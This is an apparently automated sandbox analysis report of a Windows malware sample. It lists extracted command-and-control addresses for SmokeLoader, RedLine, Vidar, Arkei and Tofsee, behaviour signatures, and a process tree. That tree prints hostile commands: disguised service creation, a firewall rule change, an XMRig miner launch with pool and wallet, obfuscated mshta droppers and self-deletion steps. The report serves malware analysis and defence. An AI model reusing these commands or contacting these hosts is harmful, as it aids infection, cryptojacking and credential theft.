Analysis

  • max time kernel
    109s
  • max time network
    152s
  • platform
    windows10_x64
  • resource
    win10-en-20211014
  • submitted
    29/11/2021, 13:38

General

  • Target

    7e6904219a2616354b67fb0aff7943d9466373f3b7b447e02091e36f909d1ef0.exe

  • Size

    335KB

  • MD5

    0b2ff36e8765a31be2a3db5cab686409

  • SHA1

    df3ac2509b3ae33af1528ee2331a8ccfa217bd5f

  • SHA256

    7e6904219a2616354b67fb0aff7943d9466373f3b7b447e02091e36f909d1ef0

  • SHA512

    c7da3e59c26ec4b409ba120b88d9f2798ece8f3e6e44004855182dba6752f28f4e05740c96300cab3e99323e3977f3f2bdb7f07228f74a78fedf36859998ffd2

Malware Config

Extracted

Family

smokeloader

Version

2020

C2

http://host-data-coin-11.com/

http://file-coin-host-12.com/

http://srtuiyhuali.at/

http://fufuiloirtu.com/

http://amogohuigotuli.at/

http://novohudosovu.com/

http://brutuilionust.com/

http://bubushkalioua.com/

http://dumuilistrati.at/

http://verboliatsiaeeees.com/

rc4.i32
rc4.i32
rc4.i32
rc4.i32

Extracted

Family

tofsee

C2

quadoil.ru

lakeflex.ru

Extracted

Family

redline

C2

185.189.167.130:38637

Extracted

Family

arkei

Botnet

Default

C2

http://file-file-host4.com/tratata.php

Extracted

Family

redline

Botnet

bbtt1

C2

212.193.30.196:13040

Extracted

Family

vidar

Version

48.7

Botnet

706

C2

https://mstdn.social/@anapa

https://mastodon.social/@mniami

Attributes
  • profile_id

    706

Extracted

Family

redline

Botnet

easy cash

C2

178.238.8.207:11703

Signatures

  • Arkei

    Arkei is an infostealer written in C++.

  • Bazar Loader

    Detected loader normally used to deploy BazarBackdoor malware.

  • CryptBot

    A C++ stealer distributed widely in bundle with other software.

  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

  • RedLine Payload 9 IoCs
  • SmokeLoader

    Modular backdoor trojan in use since 2014.

  • Tofsee

    Backdoor/botnet which carries out malicious activities based on commands from a C2 server.

  • Vidar

    Vidar is an infostealer based on Arkei stealer.

  • Windows security bypass 2 TTPs
  • suricata: ET MALWARE Suspicious Zipped Filename in Outbound POST Request (Passwords.txt)

    suricata: ET MALWARE Suspicious Zipped Filename in Outbound POST Request (Passwords.txt)

  • suricata: ET MALWARE Vidar/Arkei Stealer Client Data Upload

    suricata: ET MALWARE Vidar/Arkei Stealer Client Data Upload

  • suricata: ET MALWARE Vidar/Arkei/Megumin/Oski Stealer Data Exfil

    suricata: ET MALWARE Vidar/Arkei/Megumin/Oski Stealer Data Exfil

  • xmrig

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

  • Arkei Stealer Payload 1 IoCs
  • Bazar/Team9 Loader payload 1 IoCs
  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs
  • Vidar Stealer 2 IoCs
  • XMRig Miner Payload 3 IoCs
  • Creates new service(s) 1 TTPs
  • Downloads MZ/PE file
  • Executes dropped EXE 13 IoCs
  • Modifies Windows Firewall 1 TTPs
  • Sets service image path in registry 2 TTPs
  • Checks BIOS information in registry 2 TTPs 2 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Deletes itself 1 IoCs
  • Loads dropped DLL 3 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Themida packer 12 IoCs

    Detects Themida, an advanced Windows software protection system.

  • Accesses Microsoft Outlook profiles 1 TTPs 3 IoCs
  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Checks whether UAC is enabled 1 TTPs 1 IoCs
  • Drops file in System32 directory 2 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 1 IoCs
  • Suspicious use of SetThreadContext 5 IoCs
  • Launches sc.exe

    Sc.exe is a Windows utlilty to control services on the system.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Checks SCSI registry key(s) 3 TTPs 9 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Checks processor information in registry 2 TTPs 2 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Delays execution with timeout.exe 4 IoCs
  • Kills process with taskkill 2 IoCs
  • Modifies data under HKEY_USERS 13 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious behavior: MapViewOfSection 7 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • outlook_office_path 1 IoCs
  • outlook_win_path 1 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\7e6904219a2616354b67fb0aff7943d9466373f3b7b447e02091e36f909d1ef0.exe
    "C:\Users\Admin\AppData\Local\Temp\7e6904219a2616354b67fb0aff7943d9466373f3b7b447e02091e36f909d1ef0.exe"
    1⤵
    • Suspicious use of SetThreadContext
    • Suspicious use of WriteProcessMemory
    PID:2364
    • C:\Users\Admin\AppData\Local\Temp\7e6904219a2616354b67fb0aff7943d9466373f3b7b447e02091e36f909d1ef0.exe
      "C:\Users\Admin\AppData\Local\Temp\7e6904219a2616354b67fb0aff7943d9466373f3b7b447e02091e36f909d1ef0.exe"
      2⤵
      • Checks SCSI registry key(s)
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious behavior: MapViewOfSection
      PID:2780
  • C:\Users\Admin\AppData\Local\Temp\3B01.exe
    C:\Users\Admin\AppData\Local\Temp\3B01.exe
    1⤵
    • Executes dropped EXE
    • Suspicious use of SetThreadContext
    • Suspicious use of WriteProcessMemory
    PID:2872
    • C:\Users\Admin\AppData\Local\Temp\3B01.exe
      C:\Users\Admin\AppData\Local\Temp\3B01.exe
      2⤵
      • Executes dropped EXE
      • Checks SCSI registry key(s)
      • Suspicious behavior: MapViewOfSection
      PID:1528
  • C:\Users\Admin\AppData\Local\Temp\509E.exe
    C:\Users\Admin\AppData\Local\Temp\509E.exe
    1⤵
    • Executes dropped EXE
    • Suspicious use of WriteProcessMemory
    PID:1808
    • C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /C mkdir C:\Windows\SysWOW64\nyhfqylm\
      2⤵
        PID:1300
      • C:\Windows\SysWOW64\cmd.exe
        "C:\Windows\System32\cmd.exe" /C move /Y "C:\Users\Admin\AppData\Local\Temp\odijdloh.exe" C:\Windows\SysWOW64\nyhfqylm\
        2⤵
          PID:1196
        • C:\Windows\SysWOW64\sc.exe
          "C:\Windows\System32\sc.exe" create nyhfqylm binPath= "C:\Windows\SysWOW64\nyhfqylm\odijdloh.exe /d\"C:\Users\Admin\AppData\Local\Temp\509E.exe\"" type= own start= auto DisplayName= "wifi support"
          2⤵
            PID:1012
          • C:\Windows\SysWOW64\sc.exe
            "C:\Windows\System32\sc.exe" description nyhfqylm "wifi internet conection"
            2⤵
              PID:644
            • C:\Windows\SysWOW64\sc.exe
              "C:\Windows\System32\sc.exe" start nyhfqylm
              2⤵
                PID:1816
              • C:\Windows\SysWOW64\netsh.exe
                "C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="Host-process for services of Windows" dir=in action=allow program="C:\Windows\SysWOW64\svchost.exe" enable=yes>nul
                2⤵
                  PID:2288
              • C:\Users\Admin\AppData\Local\Temp\655F.exe
                C:\Users\Admin\AppData\Local\Temp\655F.exe
                1⤵
                • Executes dropped EXE
                • Suspicious use of SetThreadContext
                • Suspicious use of WriteProcessMemory
                PID:2456
                • C:\Users\Admin\AppData\Local\Temp\655F.exe
                  C:\Users\Admin\AppData\Local\Temp\655F.exe
                  2⤵
                  • Executes dropped EXE
                  • Suspicious use of AdjustPrivilegeToken
                  PID:2216
              • C:\Windows\SysWOW64\nyhfqylm\odijdloh.exe
                C:\Windows\SysWOW64\nyhfqylm\odijdloh.exe /d"C:\Users\Admin\AppData\Local\Temp\509E.exe"
                1⤵
                • Executes dropped EXE
                • Suspicious use of SetThreadContext
                • Suspicious use of WriteProcessMemory
                PID:3880
                • C:\Windows\SysWOW64\svchost.exe
                  svchost.exe
                  2⤵
                  • Drops file in System32 directory
                  • Suspicious use of SetThreadContext
                  • Modifies data under HKEY_USERS
                  • Suspicious use of WriteProcessMemory
                  PID:3264
                  • C:\Windows\SysWOW64\svchost.exe
                    svchost.exe -o fastpool.xyz:10060 -u 9rLbTvsApFs3i3ojk5hDKicMNRQbxxFGwJA2hNC6NoZZDQN5tTFbhviFm4W3koxSrPg87Lnif7qxFYh9xpTJz1cT6B17Ph4.50000 -p x -k -a cn/half
                    3⤵
                    • Suspicious use of AdjustPrivilegeToken
                    PID:2472
              • C:\Users\Admin\AppData\Local\Temp\A1EC.exe
                C:\Users\Admin\AppData\Local\Temp\A1EC.exe
                1⤵
                • Executes dropped EXE
                • Checks SCSI registry key(s)
                • Suspicious behavior: MapViewOfSection
                PID:3704
              • C:\Users\Admin\AppData\Local\Temp\C2D3.exe
                C:\Users\Admin\AppData\Local\Temp\C2D3.exe
                1⤵
                • Executes dropped EXE
                • Loads dropped DLL
                PID:3516
                • C:\Windows\SysWOW64\cmd.exe
                  "C:\Windows\System32\cmd.exe" /c timeout /t 5 & del /f /q "C:\Users\Admin\AppData\Local\Temp\C2D3.exe" & exit
                  2⤵
                    PID:1436
                    • C:\Windows\SysWOW64\timeout.exe
                      timeout /t 5
                      3⤵
                      • Delays execution with timeout.exe
                      PID:3920
                • C:\Windows\system32\regsvr32.exe
                  regsvr32 /s C:\Users\Admin\AppData\Local\Temp\EE0A.dll
                  1⤵
                  • Loads dropped DLL
                  PID:1236
                • C:\Users\Admin\AppData\Local\Temp\A7D.exe
                  C:\Users\Admin\AppData\Local\Temp\A7D.exe
                  1⤵
                  • Executes dropped EXE
                  PID:3640
                  • C:\Windows\SysWOW64\mshta.exe
                    "C:\Windows\System32\mshta.exe" VBSCrIPT: ClOSE ( CREaTEOBjeCt ( "wscRipT.shell" ). RUN ( "C:\Windows\system32\cmd.exe /q /R coPY /Y ""C:\Users\Admin\AppData\Local\Temp\A7D.exe"" ..\5b1_g~qYDZdSZ8W.eXe && StaRT ..\5b1_g~qYdZdSZ8W.eXE -PVQQIyT0eqsTq & If """" == """" for %o iN ( ""C:\Users\Admin\AppData\Local\Temp\A7D.exe"" ) do taskkill -F -IM ""%~Nxo"" " , 0 , True ) )
                    2⤵
                      PID:1336
                      • C:\Windows\SysWOW64\cmd.exe
                        "C:\Windows\system32\cmd.exe" /q /R coPY /Y "C:\Users\Admin\AppData\Local\Temp\A7D.exe" ..\5b1_g~qYDZdSZ8W.eXe && StaRT ..\5b1_g~qYdZdSZ8W.eXE -PVQQIyT0eqsTq & If "" == "" for %o iN ( "C:\Users\Admin\AppData\Local\Temp\A7D.exe" ) do taskkill -F -IM "%~Nxo"
                        3⤵
                          PID:1372
                          • C:\Users\Admin\AppData\Local\Temp\5b1_g~qYDZdSZ8W.eXe
                            ..\5b1_g~qYdZdSZ8W.eXE -PVQQIyT0eqsTq
                            4⤵
                            • Executes dropped EXE
                            PID:1548
                            • C:\Windows\SysWOW64\mshta.exe
                              "C:\Windows\System32\mshta.exe" VBSCrIPT: ClOSE ( CREaTEOBjeCt ( "wscRipT.shell" ). RUN ( "C:\Windows\system32\cmd.exe /q /R coPY /Y ""C:\Users\Admin\AppData\Local\Temp\5b1_g~qYDZdSZ8W.eXe"" ..\5b1_g~qYDZdSZ8W.eXe && StaRT ..\5b1_g~qYdZdSZ8W.eXE -PVQQIyT0eqsTq & If ""-PVQQIyT0eqsTq "" == """" for %o iN ( ""C:\Users\Admin\AppData\Local\Temp\5b1_g~qYDZdSZ8W.eXe"" ) do taskkill -F -IM ""%~Nxo"" " , 0 , True ) )
                              5⤵
                                PID:2288
                                • C:\Windows\SysWOW64\cmd.exe
                                  "C:\Windows\system32\cmd.exe" /q /R coPY /Y "C:\Users\Admin\AppData\Local\Temp\5b1_g~qYDZdSZ8W.eXe" ..\5b1_g~qYDZdSZ8W.eXe && StaRT ..\5b1_g~qYdZdSZ8W.eXE -PVQQIyT0eqsTq & If "-PVQQIyT0eqsTq " == "" for %o iN ( "C:\Users\Admin\AppData\Local\Temp\5b1_g~qYDZdSZ8W.eXe" ) do taskkill -F -IM "%~Nxo"
                                  6⤵
                                    PID:3224
                                • C:\Windows\SysWOW64\mshta.exe
                                  "C:\Windows\System32\mshta.exe" VBscriPT: CLOse( crEatEobJect ( "WSCRIPT.sHEll" ). run ( "C:\Windows\system32\cmd.exe /C echO | Set /p = ""MZ"" > Y9P8GeW.SYt& coPy /y /b Y9P8GeW.Syt+ iDTWeX.KR + 6VXIK.D + WNYGk.9UB ..\6KSsiU1.MB & del /Q *& STaRt odbcconf /a { REgsvr ..\6ksSIU1.MB } " , 0 , tRuE ) )
                                  5⤵
                                    PID:916
                                    • C:\Windows\SysWOW64\cmd.exe
                                      "C:\Windows\system32\cmd.exe" /C echO | Set /p = "MZ" > Y9P8GeW.SYt& coPy /y /b Y9P8GeW.Syt+ iDTWeX.KR + 6VXIK.D + WNYGk.9UB ..\6KSsiU1.MB & del /Q *& STaRt odbcconf /a { REgsvr ..\6ksSIU1.MB }
                                      6⤵
                                        PID:3936
                                        • C:\Windows\SysWOW64\cmd.exe
                                          C:\Windows\system32\cmd.exe /S /D /c" echO "
                                          7⤵
                                            PID:836
                                          • C:\Windows\SysWOW64\cmd.exe
                                            C:\Windows\system32\cmd.exe /S /D /c" Set /p = "MZ" 1>Y9P8GeW.SYt"
                                            7⤵
                                              PID:1180
                                            • C:\Windows\SysWOW64\odbcconf.exe
                                              odbcconf /a { REgsvr ..\6ksSIU1.MB }
                                              7⤵
                                              • Loads dropped DLL
                                              PID:2352
                                      • C:\Windows\SysWOW64\taskkill.exe
                                        taskkill -F -IM "A7D.exe"
                                        4⤵
                                        • Kills process with taskkill
                                        • Suspicious use of AdjustPrivilegeToken
                                        PID:2072
                                • C:\Users\Admin\AppData\Local\Temp\153C.exe
                                  C:\Users\Admin\AppData\Local\Temp\153C.exe
                                  1⤵
                                  • Executes dropped EXE
                                  PID:4068
                                • C:\Users\Admin\AppData\Local\Temp\2C7E.exe
                                  C:\Users\Admin\AppData\Local\Temp\2C7E.exe
                                  1⤵
                                  • Executes dropped EXE
                                  • Checks BIOS information in registry
                                  • Checks whether UAC is enabled
                                  • Suspicious use of NtSetInformationThreadHideFromDebugger
                                  • Checks processor information in registry
                                  PID:2740
                                  • C:\Windows\SysWOW64\cmd.exe
                                    "C:\Windows\system32\cmd.exe" /c rd /s /q C:\Users\Admin\AppData\Local\Temp\jsSNIsLbpGnpo & timeout 4 & del /f /q "C:\Users\Admin\AppData\Local\Temp\2C7E.exe"
                                    2⤵
                                      PID:520
                                      • C:\Windows\SysWOW64\timeout.exe
                                        timeout 4
                                        3⤵
                                        • Delays execution with timeout.exe
                                        PID:1704
                                  • C:\Users\Admin\AppData\Local\Temp\39DD.exe
                                    C:\Users\Admin\AppData\Local\Temp\39DD.exe
                                    1⤵
                                    • Executes dropped EXE
                                    PID:2140
                                    • C:\Windows\SysWOW64\cmd.exe
                                      "C:\Windows\System32\cmd.exe" /c taskkill /im 39DD.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Local\Temp\39DD.exe" & del C:\ProgramData\*.dll & exit
                                      2⤵
                                        PID:3536
                                        • C:\Windows\SysWOW64\taskkill.exe
                                          taskkill /im 39DD.exe /f
                                          3⤵
                                          • Kills process with taskkill
                                          PID:1676
                                        • C:\Windows\SysWOW64\timeout.exe
                                          timeout /t 6
                                          3⤵
                                          • Delays execution with timeout.exe
                                          PID:1160
                                    • C:\Windows\SysWOW64\explorer.exe
                                      C:\Windows\SysWOW64\explorer.exe
                                      1⤵
                                      • Accesses Microsoft Outlook profiles
                                      • outlook_office_path
                                      • outlook_win_path
                                      PID:3248
                                    • C:\Windows\explorer.exe
                                      C:\Windows\explorer.exe
                                      1⤵
                                        PID:2428
                                      • C:\Users\Admin\AppData\Roaming\uuhsvar
                                        C:\Users\Admin\AppData\Roaming\uuhsvar
                                        1⤵
                                          PID:2168
                                        • C:\Users\Admin\AppData\Roaming\suhsvar
                                          C:\Users\Admin\AppData\Roaming\suhsvar
                                          1⤵
                                            PID:1712
                                          • C:\Users\Admin\AppData\Local\Temp\664D.exe
                                            C:\Users\Admin\AppData\Local\Temp\664D.exe
                                            1⤵
                                              PID:3940
                                              • C:\Windows\SysWOW64\cmd.exe
                                                "C:\Windows\system32\cmd.exe" /c rd /s /q C:\Users\Admin\AppData\Local\Temp\iiQnGrbd & timeout 4 & del /f /q "C:\Users\Admin\AppData\Local\Temp\664D.exe"
                                                2⤵
                                                  PID:968
                                                  • C:\Windows\SysWOW64\timeout.exe
                                                    timeout 4
                                                    3⤵
                                                    • Delays execution with timeout.exe
                                                    PID:2728
                                              • C:\Users\Admin\AppData\Local\Temp\94B1.exe
                                                C:\Users\Admin\AppData\Local\Temp\94B1.exe
                                                1⤵
                                                  PID:3144
                                                • C:\Windows\System32\rundll32.exe
                                                  C:\Windows\System32\rundll32.exe C:\Users\Admin\AppData\Local\Temp\EE0A.dll,DllRegisterServer {62919027-746D-4D60-B590-6C9C5BBD4451}
                                                  1⤵
                                                    PID:2676

                                                  Network

                                                        MITRE ATT&CK Enterprise v6

                                                        Replay Monitor

                                                        Loading Replay Monitor...

                                                        Downloads

                                                        • memory/1236-272-0x0000000001EA0000-0x0000000001ECA000-memory.dmp

                                                          Filesize

                                                          168KB

                                                        • memory/1712-326-0x0000000003230000-0x000000000337A000-memory.dmp

                                                          Filesize

                                                          1.3MB

                                                        • memory/1808-133-0x0000000000400000-0x000000000322A000-memory.dmp

                                                          Filesize

                                                          46.2MB

                                                        • memory/1808-132-0x0000000003310000-0x0000000003323000-memory.dmp

                                                          Filesize

                                                          76KB

                                                        • memory/2140-259-0x0000000003880000-0x0000000003955000-memory.dmp

                                                          Filesize

                                                          852KB

                                                        • memory/2140-261-0x0000000000400000-0x000000000329A000-memory.dmp

                                                          Filesize

                                                          46.6MB

                                                        • memory/2140-254-0x00000000034C3000-0x000000000353F000-memory.dmp

                                                          Filesize

                                                          496KB

                                                        • memory/2168-302-0x0000000000400000-0x000000000042C000-memory.dmp

                                                          Filesize

                                                          176KB

                                                        • memory/2168-299-0x0000000000430000-0x00000000004DE000-memory.dmp

                                                          Filesize

                                                          696KB

                                                        • memory/2168-298-0x0000000000430000-0x00000000004DE000-memory.dmp

                                                          Filesize

                                                          696KB

                                                        • memory/2216-151-0x0000000000400000-0x0000000000420000-memory.dmp

                                                          Filesize

                                                          128KB

                                                        • memory/2216-157-0x0000000004CC0000-0x0000000004CC1000-memory.dmp

                                                          Filesize

                                                          4KB

                                                        • memory/2216-160-0x0000000004C60000-0x0000000005266000-memory.dmp

                                                          Filesize

                                                          6.0MB

                                                        • memory/2216-159-0x0000000004D60000-0x0000000004D61000-memory.dmp

                                                          Filesize

                                                          4KB

                                                        • memory/2216-158-0x0000000004DF0000-0x0000000004DF1000-memory.dmp

                                                          Filesize

                                                          4KB

                                                        • memory/2216-172-0x0000000005060000-0x0000000005061000-memory.dmp

                                                          Filesize

                                                          4KB

                                                        • memory/2216-174-0x0000000005C20000-0x0000000005C21000-memory.dmp

                                                          Filesize

                                                          4KB

                                                        • memory/2216-180-0x0000000006890000-0x0000000006891000-memory.dmp

                                                          Filesize

                                                          4KB

                                                        • memory/2216-156-0x0000000005270000-0x0000000005271000-memory.dmp

                                                          Filesize

                                                          4KB

                                                        • memory/2216-181-0x0000000006F90000-0x0000000006F91000-memory.dmp

                                                          Filesize

                                                          4KB

                                                        • memory/2216-161-0x0000000004D00000-0x0000000004D01000-memory.dmp

                                                          Filesize

                                                          4KB

                                                        • memory/2352-290-0x00000000051A0000-0x000000000523C000-memory.dmp

                                                          Filesize

                                                          624KB

                                                        • memory/2352-260-0x0000000002F00000-0x0000000002F01000-memory.dmp

                                                          Filesize

                                                          4KB

                                                        • memory/2352-262-0x0000000004E70000-0x0000000004F69000-memory.dmp

                                                          Filesize

                                                          996KB

                                                        • memory/2352-289-0x00000000051A0000-0x000000000523C000-memory.dmp

                                                          Filesize

                                                          624KB

                                                        • memory/2352-288-0x00000000050F0000-0x00000000051A0000-memory.dmp

                                                          Filesize

                                                          704KB

                                                        • memory/2352-263-0x0000000005030000-0x00000000050E6000-memory.dmp

                                                          Filesize

                                                          728KB

                                                        • memory/2364-116-0x0000000003300000-0x0000000003309000-memory.dmp

                                                          Filesize

                                                          36KB

                                                        • memory/2364-115-0x00000000034A3000-0x00000000034B4000-memory.dmp

                                                          Filesize

                                                          68KB

                                                        • memory/2428-247-0x00000000007D0000-0x00000000007D7000-memory.dmp

                                                          Filesize

                                                          28KB

                                                        • memory/2428-248-0x00000000007C0000-0x00000000007CC000-memory.dmp

                                                          Filesize

                                                          48KB

                                                        • memory/2456-149-0x0000000005810000-0x0000000005811000-memory.dmp

                                                          Filesize

                                                          4KB

                                                        • memory/2456-138-0x0000000000990000-0x0000000000991000-memory.dmp

                                                          Filesize

                                                          4KB

                                                        • memory/2456-143-0x00000000051B0000-0x00000000051B1000-memory.dmp

                                                          Filesize

                                                          4KB

                                                        • memory/2456-146-0x0000000002D10000-0x0000000002D11000-memory.dmp

                                                          Filesize

                                                          4KB

                                                        • memory/2456-150-0x0000000005300000-0x0000000005301000-memory.dmp

                                                          Filesize

                                                          4KB

                                                        • memory/2472-187-0x0000000000E00000-0x0000000000EF1000-memory.dmp

                                                          Filesize

                                                          964KB

                                                        • memory/2472-182-0x0000000000E00000-0x0000000000EF1000-memory.dmp

                                                          Filesize

                                                          964KB

                                                        • memory/2740-219-0x00000000002E0000-0x0000000000A22000-memory.dmp

                                                          Filesize

                                                          7.3MB

                                                        • memory/2740-218-0x00000000002E0000-0x0000000000A22000-memory.dmp

                                                          Filesize

                                                          7.3MB

                                                        • memory/2740-217-0x00000000773F0000-0x000000007757E000-memory.dmp

                                                          Filesize

                                                          1.6MB

                                                        • memory/2740-221-0x00000000002E0000-0x0000000000A22000-memory.dmp

                                                          Filesize

                                                          7.3MB

                                                        • memory/2740-220-0x00000000002E0000-0x0000000000A22000-memory.dmp

                                                          Filesize

                                                          7.3MB

                                                        • memory/2780-117-0x0000000000400000-0x0000000000409000-memory.dmp

                                                          Filesize

                                                          36KB

                                                        • memory/2872-123-0x00000000035D3000-0x00000000035E4000-memory.dmp

                                                          Filesize

                                                          68KB

                                                        • memory/3008-315-0x0000000005500000-0x0000000005516000-memory.dmp

                                                          Filesize

                                                          88KB

                                                        • memory/3008-119-0x0000000001360000-0x0000000001376000-memory.dmp

                                                          Filesize

                                                          88KB

                                                        • memory/3008-130-0x00000000013D0000-0x00000000013E6000-memory.dmp

                                                          Filesize

                                                          88KB

                                                        • memory/3008-188-0x0000000003540000-0x0000000003556000-memory.dmp

                                                          Filesize

                                                          88KB

                                                        • memory/3144-313-0x0000000000400000-0x000000000324A000-memory.dmp

                                                          Filesize

                                                          46.3MB

                                                        • memory/3144-317-0x00000000079B0000-0x00000000079B1000-memory.dmp

                                                          Filesize

                                                          4KB

                                                        • memory/3144-303-0x0000000003563000-0x000000000358F000-memory.dmp

                                                          Filesize

                                                          176KB

                                                        • memory/3144-322-0x00000000079B3000-0x00000000079B4000-memory.dmp

                                                          Filesize

                                                          4KB

                                                        • memory/3144-320-0x00000000079B4000-0x00000000079B6000-memory.dmp

                                                          Filesize

                                                          8KB

                                                        • memory/3144-309-0x0000000005170000-0x000000000519E000-memory.dmp

                                                          Filesize

                                                          184KB

                                                        • memory/3144-312-0x0000000003250000-0x000000000339A000-memory.dmp

                                                          Filesize

                                                          1.3MB

                                                        • memory/3144-311-0x0000000005350000-0x000000000537C000-memory.dmp

                                                          Filesize

                                                          176KB

                                                        • memory/3144-319-0x00000000079B2000-0x00000000079B3000-memory.dmp

                                                          Filesize

                                                          4KB

                                                        • memory/3248-245-0x0000000002720000-0x000000000278B000-memory.dmp

                                                          Filesize

                                                          428KB

                                                        • memory/3248-244-0x0000000002A00000-0x0000000002A74000-memory.dmp

                                                          Filesize

                                                          464KB

                                                        • memory/3264-163-0x0000000000390000-0x00000000003A5000-memory.dmp

                                                          Filesize

                                                          84KB

                                                        • memory/3264-165-0x00000000000F0000-0x00000000000F1000-memory.dmp

                                                          Filesize

                                                          4KB

                                                        • memory/3264-166-0x00000000000F0000-0x00000000000F1000-memory.dmp

                                                          Filesize

                                                          4KB

                                                        • memory/3516-193-0x0000000003483000-0x0000000003497000-memory.dmp

                                                          Filesize

                                                          80KB

                                                        • memory/3516-194-0x0000000003240000-0x00000000032EE000-memory.dmp

                                                          Filesize

                                                          696KB

                                                        • memory/3516-195-0x0000000000400000-0x0000000003232000-memory.dmp

                                                          Filesize

                                                          46.2MB

                                                        • memory/3704-179-0x0000000000400000-0x000000000042C000-memory.dmp

                                                          Filesize

                                                          176KB

                                                        • memory/3704-178-0x0000000000530000-0x000000000067A000-memory.dmp

                                                          Filesize

                                                          1.3MB

                                                        • memory/3704-177-0x0000000000510000-0x0000000000519000-memory.dmp

                                                          Filesize

                                                          36KB

                                                        • memory/3880-167-0x0000000003230000-0x00000000032DE000-memory.dmp

                                                          Filesize

                                                          696KB

                                                        • memory/3880-168-0x0000000000400000-0x000000000322A000-memory.dmp

                                                          Filesize

                                                          46.2MB

                                                        • memory/3940-277-0x00000000773F0000-0x000000007757E000-memory.dmp

                                                          Filesize

                                                          1.6MB

                                                        • memory/3940-275-0x0000000000B80000-0x0000000001262000-memory.dmp

                                                          Filesize

                                                          6.9MB

                                                        • memory/3940-276-0x0000000000B80000-0x0000000001262000-memory.dmp

                                                          Filesize

                                                          6.9MB

                                                        • memory/3940-279-0x0000000000B80000-0x0000000001262000-memory.dmp

                                                          Filesize

                                                          6.9MB

                                                        • memory/3940-278-0x0000000000B80000-0x0000000001262000-memory.dmp

                                                          Filesize

                                                          6.9MB

                                                        • memory/4068-224-0x00000000032A0000-0x00000000032D9000-memory.dmp

                                                          Filesize

                                                          228KB

                                                        • memory/4068-225-0x0000000000400000-0x0000000003245000-memory.dmp

                                                          Filesize

                                                          46.3MB

                                                        • memory/4068-227-0x00000000051D0000-0x00000000051FE000-memory.dmp

                                                          Filesize

                                                          184KB

                                                        • memory/4068-229-0x0000000005450000-0x000000000547C000-memory.dmp

                                                          Filesize

                                                          176KB

                                                        • memory/4068-222-0x0000000003386000-0x00000000033B2000-memory.dmp

                                                          Filesize

                                                          176KB

                                                        • memory/4068-237-0x00000000079E0000-0x00000000079E1000-memory.dmp

                                                          Filesize

                                                          4KB

                                                        • memory/4068-240-0x00000000079E3000-0x00000000079E4000-memory.dmp

                                                          Filesize

                                                          4KB

                                                        • memory/4068-239-0x00000000079E2000-0x00000000079E3000-memory.dmp

                                                          Filesize

                                                          4KB

                                                        • memory/4068-242-0x00000000079E4000-0x00000000079E6000-memory.dmp

                                                          Filesize

                                                          8KB

                                                        • memory/4068-238-0x0000000008570000-0x0000000008571000-memory.dmp

                                                          Filesize

                                                          4KB